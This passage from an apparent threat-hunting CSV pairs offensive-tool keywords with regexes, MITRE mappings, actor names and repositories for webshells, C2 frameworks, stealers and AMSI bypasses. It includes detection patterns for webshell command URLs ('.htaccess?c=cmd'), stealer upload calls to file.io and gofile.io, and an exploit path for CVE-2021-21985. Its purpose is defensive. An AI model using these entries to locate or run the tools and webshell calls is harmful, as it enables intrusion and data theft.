Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","47566" "*HTTP-Backdoor.ps1*",".{0,1000}HTTP\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","47567" "*httpbrute.py*",".{0,1000}httpbrute\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","47568" "*http-c2_test.go*",".{0,1000}http\-c2_test\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","47569" "*HTTPClient.post('https://httpbin.org/post*",".{0,1000}HTTPClient\.post\(\'https\:\/\/httpbin\.org\/post.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https 
proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","47570" "*httpClient.PostAsync(""https://file.io/*",".{0,1000}httpClient\.PostAsync\(\""https\:\/\/file\.io\/.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","47571" "*HttpEvilClippyController*",".{0,1000}HttpEvilClippyController.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","47572" "*HTTP-Login.ps1*",".{0,1000}HTTP\-Login\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","HTTP-Login.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","47573" "*httpntlm.go*",".{0,1000}httpntlm\.go.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","47574" "*httpntlm.old*",".{0,1000}httpntlm\.old.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","47575" "*httppayload.bin*",".{0,1000}httppayload\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY 
- Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","47576" "*HttpProxyScan_Log4J2.py*",".{0,1000}HttpProxyScan_Log4J2\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","47577" "*http-redwarden*",".{0,1000}http\-redwarden.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","47578" "*httprelayclient.py*",".{0,1000}httprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","47579" "*httprelayclient.py*",".{0,1000}httprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47580" "*httprelayserver.py*",".{0,1000}httprelayserver\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 
Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","47581" "*httprelayserver.py*",".{0,1000}httprelayserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47582" "*http-request-smuggler-all.jar*",".{0,1000}http\-request\-smuggler\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation 
tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","47583" "*https://$1/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/$2*",".{0,1000}https\:\/\/\$1\/ui\/h5\-vsan\/rest\/proxy\/service\/com\.vmware\.vsan\.client\.services\.capability\.VsanCapabilityProvider\/\$2.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","0","N/A","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","47584" "*https://*.gofile.io/uploadFile*",".{0,1000}https\:\/\/.{0,1000}\.gofile\.io\/uploadFile.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","47598" "*https://*.onion*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47603" "*https://*.tor2web*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic 
through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47614" "*https://*.torlink*",".{0,1000}[a-z0-9]{16,56}\.(onion|tor2web|torlink).{0,1000}","offensive_tool_keyword","torproject","Detects suspicious TOR usage which anonymizes user's web traffic through a relay network","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","47615" "*https://*.tuns.sh*",".{0,1000}https\:\/\/.{0,1000}\.tuns\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","47619" "*https://*/.htaccess?c=cmd*",".{0,1000}https\:\/\/.{0,1000}\/\.htaccess\?c\=cmd.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","47624" "*https://*/.htaccess?c=uname -a*",".{0,1000}https\:\/\/.{0,1000}\/\.htaccess\?c\=uname\s\-a.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","47625" 
"*https://*/releases/download/*/lse.sh*",".{0,1000}https\:\/\/.{0,1000}\/releases\/download\/.{0,1000}\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","47626" "*https://*Microsoft.ActiveDirectory.Management.dll*",".{0,1000}https\:\/\/.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","N/A","2","184","19","2024-12-20T10:22:25Z","2022-12-05T12:40:02Z","47628" "*https://{server}.gofile.io/uploadFile*",".{0,1000}https\:\/\/\{server\}\.gofile\.io\/uploadFile.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","47629" "*https://0.0.0.0:1337*",".{0,1000}https\:\/\/0\.0\.0\.0\:1337.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","47630" 
"*https://0day.today/exploit/*",".{0,1000}https\:\/\/0day\.today\/exploit\/.{0,1000}","offensive_tool_keyword","0day.today","a platform providing exploit code (free and paid)","T1588.002 - T1587.001 - T1190","TA0042 - TA0009","N/A","N/A","Exploitation tool","https://0day.today/","1","1","N/A","N/A","7","6","N/A","N/A","N/A","N/A","47633" "*https://0x00sec.org/t/malware-development-1-password-stealers-chrome/33571*",".{0,1000}https\:\/\/0x00sec\.org\/t\/malware\-development\-1\-password\-stealers\-chrome\/33571.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","47634" "*https://1.3.3.7:8081*",".{0,1000}https\:\/\/1\.3\.3\.7\:8081.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","47635" "*https://127.0.0.1/dns-query*",".{0,1000}https\:\/\/127\.0\.0\.1\/dns\-query.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","1","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","47636" "*https://127.0.0.1:5000/register*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/register.{0,1000}","offensive_tool_keyword","Commander","A 
command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","47637" "*https://127.0.0.1:5000/results/*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/results\/.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","47638" "*https://127.0.0.1:5000/tasks/*",".{0,1000}https\:\/\/127\.0\.0\.1\:5000\/tasks\/.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","47639" "*https://127.0.0.1:60443*",".{0,1000}https\:\/\/127\.0\.0\.1\:60443.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop_0x727","1","0","N/A","N/A","10","10","217","38","2021-08-17T15:24:50Z","2021-08-17T10:37:44Z","47640" "*https://127.0.0.1:7443*",".{0,1000}https\:\/\/127\.0\.0\.1\:7443.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","47641" 
"*https://127.0.0.1:7443*",".{0,1000}https\:\/\/127\.0\.0\.1\:7443.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","47642" "*https://5pider.net/blog/2024/01/27/modern-shellcode-implant-design*",".{0,1000}https\:\/\/5pider\.net\/blog\/2024\/01\/27\/modern\-shellcode\-implant\-design.{0,1000}","offensive_tool_keyword","Stardust","A modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","47647" "*https://adaptix-framework.gitbook.io/adaptix-framework/adaptix-c2/getting-starting/*",".{0,1000}https\:\/\/adaptix\-framework\.gitbook\.io\/adaptix\-framework\/adaptix\-c2\/getting\-starting\/.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","1","N/A","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","47649" "*https://amsi.fail/*",".{0,1000}https\:\/\/amsi\.fail\/.{0,1000}","offensive_tool_keyword","amsi.fail","AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. 
